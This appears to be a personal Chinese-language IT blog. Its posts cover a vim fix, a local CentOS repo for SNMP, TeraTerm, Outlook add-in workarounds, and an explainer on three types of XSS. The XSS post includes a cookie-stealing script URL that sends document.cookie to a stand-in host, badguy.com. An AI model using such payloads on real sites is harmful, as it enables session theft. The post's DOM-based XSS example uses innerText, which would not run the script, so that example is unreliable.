2025年3月23日 星期日

Ubuntu 24.04.2系統vi編輯器上下左右鍵變ABCD,按空白和Enter,編輯的很奇怪的解決方式

Ubuntu 24.04.2系統vi編輯器上下左右鍵變ABCD,按空白和Enter,編輯的很奇怪的解決方式。

編輯的時候,感到很困擾,就覺得怎麼怪怪,一度還懷疑自己的電腦環境,怎麼了。

經過網路爬文,聽聞這個問題是由ubuntu系統內建的 vi版本太老導致的,所以解決方案就是安裝新版的vi編輯器即可:
首先卸載舊版本的vi編輯器:

  $sudo apt-get remove vim-common

  然後安裝新版vi即可:

  $sudo apt-get install vim


昏倒很奇怪,我明明是安裝新的版本ubuntu-24.04.2-desktop。
這已經是很新的版本Linux,怎麼還是用 舊版vi呢?

2025年2月6日 星期四

掛載 CentOS 8 Linux ISO 來當作本地倉庫,以安裝SNMP來示範。

由於舊版的Linux,可能因為原廠停止維護支援,已經無法線上yum or dnf安裝相關套件。
我們可以改用掛載 CentOS 8 ISO 來當作本地倉庫,就可以進行yum or dnf安裝。但建議盡量優先安裝新版,比較沒有資安漏洞或程式老舊的問題。

第一部分: 掛載 CentOS 8 Linux ISO 來當作本地倉庫,安裝套件。
步驟一:掛載 CentOS 8 ISO
1.建立掛載目錄
#mkdir -p /mnt/centos8

2.掛載光碟機
#mount /dev/sr0 /mnt/centos8

或是掛載ISO(擇一)
#mount -o loop /path/to/CentOS-8.4.2105-x86_64-dvd1.iso /mnt/centos8

3.確認掛載成功
#ls /mnt/centos8

步驟二:建立本地倉庫
1.產生倉庫設定檔
#vi /etc/yum.repos.d/centos8-local.repo

加入以下內容:
-----------------------------------------------------------
[centos8-local]
name=CentOS 8 Local Repo
baseurl=file:///mnt/centos8/BaseOS/
enabled=1
gpgcheck=0

[centos8-appstream]
name=CentOS 8 AppStream Repo
baseurl=file:///mnt/centos8/AppStream/
enabled=1
gpgcheck=0
-----------------------------------------------------------

2.清除快取並更新倉庫

#dnf clean all
#dnf makecache
#dnf repolist

如果倉庫成功掛載,你應該會看到 centos8-local 和 centos8-appstream。


步驟三:安裝 net-snmp

#dnf install -y net-snmp  net-snmp-utils

這樣就會從 掛載的 CentOS 8 ISO 來安裝 net-snmp,而不需要透過網路下載。

=============
第二部分: SNMP安裝完後的設定和使用。
1.檢查 snmpd.conf 設定
vim /etc/snmp/snmpd.conf


snmpd.conf 原廠設定值僅供參考,請了解各設定值的意義,再行設定。


2. 檢查 SELinux (如果啟用了)
#getenforce
如果返回 Enforcing,可以先嘗試暫時關閉:

#setenforce 0
然後再測試 SNMP 是否能被監控主機訪問。如果這樣解決了問題,可能需要配置 SELinux 政策來允許 SNMP。


3.
 檢查防火牆設定

查看防火牆規則:
#firewall-cmd --list-all

如果防火牆開啟了 (firewalld 是 running),你需要允許 UDP 161 埠:
#firewall-cmd --add-port=161/udp --permanent
#firewall-cmd --reload


或者允許 SNMP 服務:
#firewall-cmd --add-service=snmp --permanent
#firewall-cmd --reload

4. 測試從監控主機連線

待補...







2024年8月23日 星期五

TeraTerm是一款開放原始碼的遠程客戶端操作軟體

因為工作需求,有時我們需要從遠端登入某設備或是主機,又或者因為故障排除,需要透過serial port連入某設備進行檢查和操控。 偶然看到某SI的工程師,使用這個工具,想說也來使用看看。心中相信這應該是好工具,人家才會用它。 我自己通常都是簡單使用的話用 putty,想要用好一點的功能是用xshell,但因為xshell改版,雖然有提供免費申請,但每隔一段時間,就突然不能用,需要升級版本或註冊一次。 若急用時,真的感到很煩很困擾。所以想換個工具來用用。 TeraTerm,是一款開放原始碼的遠程客戶端操作軟體,一開始是由日本物理學家寺西高開發並發布的,之後是由TeraTerm Project在BSD許可證下進行維護支持。 



該軟體支持的通信協議有SSH、telnet、序列埠通信,僅支持Microsoft Windows操作系統。 TeraTerm 專案將開發終端模擬器「Tera Term」和 SSH 模組「TTSSH」。該軟體是BSD許可下的開源軟體。這是Tera Term Pro 2.3繼承版本,正在獲得原作者的正式認可。GitHub 上的 專案頁面正在繼續開發。 


官網: https://teratermproject.github.io/index-en.html

2024年8月22日 星期四

PowerShell 抓取電腦序號(品牌電腦序號)

PowerShell 抓取電腦序號 (品牌電腦序號) Windows 筆記型電腦與桌上型電腦 在 Windows 搜尋欄中輸入 PowerShell ,然後從結果清單中選取 Windows PowerShell 。 在 PowerShell 視窗中,輸入 GWMI -Class Win32_Bios | select SerialNumber 然後按下 Enter 鍵。 隨即會顯示產品服務編號 (序號)。

2024年8月9日 星期五

關於微軟Outlook增益集,莫名自行停用問題排除

關於微軟Outlook增益集,莫名自行停用問題排除

有某些第三方軟體業者,會在Outlook內,使用外掛的增益集。
但Outlook經常,自我偵測,覺得此增益集慢,就很自以為是的,把此增益集關掉。
造成使用者,還要為此,另外再開啟此增益集。


***簡單處理方式(懶人包): 

1.另針對慢速及停用的增益集內容,若已將增益集設定為”永遠啟用此增益集”。

2.選項部分請選擇【隨時監視這個增益集】。

================

此問題並非是增益集本身的問題造成,微軟Outlook對於其他第三方軟體業者(許多知名軟體公司,也表示請自己手動開啟,如: Cisco,Oracle,Norton,甚至自家Teams,也有可能被關。),也都有可能會發生,自動偵測判斷的機制,自行停用此增益集的問題,其他業者,只能表示請使用者,手動打開這個功能。

資訊來源:

微軟:

https://support.microsoft.com/zh-tw/office/outlook-%E5%A2%9E%E7%9B%8A%E9%9B%86%E7%9A%84%E8%AD%A6%E5%91%8A-346f5ae7-b996-46d1-a56d-410b9b082a7c


第三方業者:

Norton

https://support.norton.com/sp/zh/tw/home/current/solutions/v120037594

 

Cisco

https://help.webex.com/zh-tw/article/n7iwqy2/%E5%9C%A8-Microsoft-Outlook-%E4%B8%AD%E5%95%9F%E7%94%A8-Webex-Meetings-%E6%A1%8C%E9%9D%A2%E6%87%89%E7%94%A8%E7%A8%8B%E5%BC%8F%EF%BC%88Windows%EF%BC%89

=========================

Outlook 增益集的警告
Outlook 增益集和 COM 增益集是程式會在 Outlook 中執行,並執行 Outlook 不提供的動作。例如,如果您使用的密碼管理服務或線上會議服務,包括 Skype,您可能必須協助您透過 Outlook 增益集。
由於增益集是不同的程式,有時候 Outlook COM 增益集可以發生問題的其餘部分 Outlook 速度變慢。這些問題可能因為延遲的事件,例如 Outlook 資料夾,新的電子郵件的送達之間切換開啟行事曆項目等。

============

補充知識:(待測試,但覺得具有可行性) 

這是微軟自己提出的解法,針對 [因為 Teams 會議增益集已停用,因此無法在 Outlook 中建立 Teams 會議],提出一個可以自行加入regedit的做法。


問題

當您嘗試在 Outlook 電腦版中建立 Teams 會議時,您發現功能區上缺少該選項。

如果 Teams 會議增益集停用,可能會發生此問題。 

狀態:因應措施

Teams 和 Outlook 產品團隊正在修正 Outlook 基於各種效能原因而導致停用 Teams 會議增益集的問題。  最新的組建中包含立即修正程式,並持續努力解決此類別的程式碼變更和工具設定問題。     

您可以採取下列步驟來還原 Teams 會議增益集:

  1. 在 Outlook 電腦版中,按一下 [檔案> 管理 COM 增益集]

  2. 展開 Microsoft Office 的 Microsoft Teams 會議增益集選項,並選取 [在接下來的 30 天內不要監視此增益集]。  如果該選項無法使用,請選取 [ 一律啟用此增益集]。 然後選取 [ 套用 並 關閉]

[慢] 和 [停用增益集] 對話方塊的螢幕擷取畫面

如果上述步驟無法解決問題,請從 [停用的專案] 對話方塊重新啟用增益集。

若要重新啟用 Teams 會議增益集:

  1. 在 Outlook 中,選取 [ 檔案>選項>載入 宏>管理],選取 [停用的專案],然後選取 [移至]

  2. 如果您看到 Teams 列在 [停用的專案] 底下,請選取它,然後選取 [ 啟用]

  3. 重新開機 Outlook 並確認增益集是否正常運作。

Outlook 選項視窗的螢幕擷取畫面

啟用已停用專案的對話方塊螢幕擷取畫面。

另一個協助防止 Outlook 停用 Teams 會議增益集的措施是新增此登錄機碼:

  1. 開 啟登錄編輯程式。

  2. 移至登錄 Computer\HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Resiliency\DoNotDisableAddinList

  3. 建立新的 DWORD (32 位) 值:

    1. 名稱:TeamsAddin.FastConnect

    2. 值:1


資訊來源:

微軟網站: https://support.microsoft.com/zh-tw/topic/%E5%9B%A0%E7%82%BA-teams-%E6%9C%83%E8%AD%B0%E5%A2%9E%E7%9B%8A%E9%9B%86%E5%B7%B2%E5%81%9C%E7%94%A8-%E5%9B%A0%E6%AD%A4%E7%84%A1%E6%B3%95%E5%9C%A8-outlook-%E4%B8%AD%E5%BB%BA%E7%AB%8B-teams-%E6%9C%83%E8%AD%B0-5640438b-e233-4921-9237-5bbfff7f9509





2024年7月30日 星期二

介紹網站漏洞 SQL injection,認識常見 SQL 查詢語法。

介紹網站漏洞 SQL injection,認識常見 SQL 查詢語言,查詢技巧語法。

資料來源:
https://blog.feifei.tw/sql-injection/

XSS三種攻擊種類

XSS三種攻擊種類

看了好幾篇XSS攻擊種類,就下面這篇,看得比較懂。
所以想收集一下,怕以後找不到。
================

資料來源: https://hackmd.io/yVOX8uJUTuCmfJccGD6dqw
參考資料:經典駭客攻擊教程:給每個人的網站安全入門 作者 Jayden Lin
https://hahow.in/courses/5aca2dc9d21aee001e55b296/
https://medium.com/程式猿吃香蕉



XSS攻擊的核心包括:
注入惡意腳本:攻擊者在網站上注入惡意的JavaScript腳本。
瀏覽器執行:當其他用戶瀏覽受影響的網頁時,這些惡意腳本在他們的瀏覽器中被執行。
網站信任漏洞:這種攻擊通常發生因為網站對用戶輸入的資料沒有進行充分的檢查或過濾,導致瀏覽器誤信這些腳本是安全的。
總而言之,XSS攻擊利用了網站對用戶輸入資料處理不當,從而在其他用戶的瀏覽器中執行惡意腳本。
1. 反射型 XSS(Reflective XSS)
觸發方式:當使用者點擊包含惡意腳本的特製連結時觸發。
腳本位置:腳本在使用者的請求發送到伺服器後,隨即由伺服器返回並在使用者的瀏覽器中執行。
受害範圍:攻擊是一次性的,只有當用戶實際點擊連結時才會發生。
舉例:
一個購物網站的搜索功能,允許用戶輸入搜索詞。一個攻擊者可能會在搜索框中輸入一段 JavaScript 代碼。當服務器將搜索結果(包括攻擊者的腳本)反射回用戶的瀏覽器時,腳本就會執行。假設攻擊者把一下腳本傳給用受害者,就可以偷取到對方cookie,然後偽造購物行為。

http://www.shop.com/search?query= <script>document.location='http://badguy.com/cookiestealer.php?c='+document.cookie;</script> 

只要你誤點了上面的網址之後,你的 Cookie 就會被送到駭客的網站 badguy.com,駭客取得 Cookie 之後,就可以登入你在 shop.com 的帳號購物了。

2. 持久型 XSS(Persistent/Stored XSS)
觸發方式:當攻擊者將惡意腳本儲存於網站上時觸發,例如在評論或留言板中。
腳本位置:腳本被永久儲存於伺服器上,每當該頁面被瀏覽時都會執行。
受害範圍:攻擊可以持續很長時間,影響所有瀏覽該頁面的使用者。
舉例:
在一個心情留言板上,攻擊者留下一則包含惡意 JavaScript 代碼的留言。當其他用戶瀏覽這些留言時,他們的瀏覽器會執行該代碼。

<div>
    <h3>心情留言板</h3>
</div>
<ul>
    <li>心情不好</li>
    <li>想跟朋友約吃飯</li>
    <li><script>惡意代碼</script></li>
</ul>
其中<li><script>惡意代碼</script></li>為惡意代碼代碼。

3. 基於 DOM 的 XSS(DOM-based XSS)
觸發方式:當網頁的 JavaScript 錯誤地處理了用戶的輸入,並將其添加到 DOM 中時觸發。
腳本執行:這種攻擊完全在客戶端發生,惡意腳本由瀏覽器執行,而不是由伺服器返回。
攻擊時機:攻擊依賴於用戶與網頁的互動。
舉例:
假設攻擊者想要執行一個基於 DOM 的 XSS 攻擊。他們可以透過發送帶有惡意 JavaScript 的連結來實現。

<!-- 當頁面加載時,讀取 URL 的 hash 部分並顯示在這個 div 中 -->
<div id="content"></div>

<script>
    window.onload = function() {
        // 從 URL 的 hash 中獲取文字
        var text = window.location.hash.substring(1); // # 符號後面的部分

        // 將文字顯示在 div 元素中
        document.getElementById('content').innerText = text;
    };
</script>
在這個例子中:如果 URL 是 http://www.example.com/#hello,則頁面上會顯示 "hello"。如果攻擊者創建一個 URL,如 http://www.example.com/#<script>alert('XSS');</script> 並發送給受害者,當受害者訪問這個 URL,他們的瀏覽器會讀取 hash 部分並嘗試將其內容顯示在頁面上。
URL中的hash部分(#符號之後)類似於文件(如Word文檔)中的目次功能。在網頁上,當您點擊帶有hash的連結時,瀏覽器會自動滾動到該頁面上對應ID的元素位置。這種機制常用於快速導航到長頁面上的特定部分。例如:假設一個網頁上有一段文字的ID是 section3。網頁上的一個連結是 http://www.example.com/page#section3。當用戶點擊這個連結時,瀏覽器會自動滾動到ID為 section3 的那一部分。
因此此行為與伺服器無關,也不會透過伺服器回傳,這是跟基於 DOM 的 XSS和反射型 XSS最大差別。

Ubuntu 24.04.2系統vi編輯器上下左右鍵變ABCD,按空白和Enter,編輯的很奇怪的解決方式

Ubuntu 24.04.2系統vi編輯器上下左右鍵變ABCD,按空白和Enter,編輯的很奇怪的解決方式。 編輯的時候,感到很困擾,就覺得怎麼怪怪,一度還懷疑自己的電腦環境,怎麼了。 經過網路爬文,聽聞這個問題是由ubuntu系統內建的 vi版本太老導致的,所以解決方案就是安裝...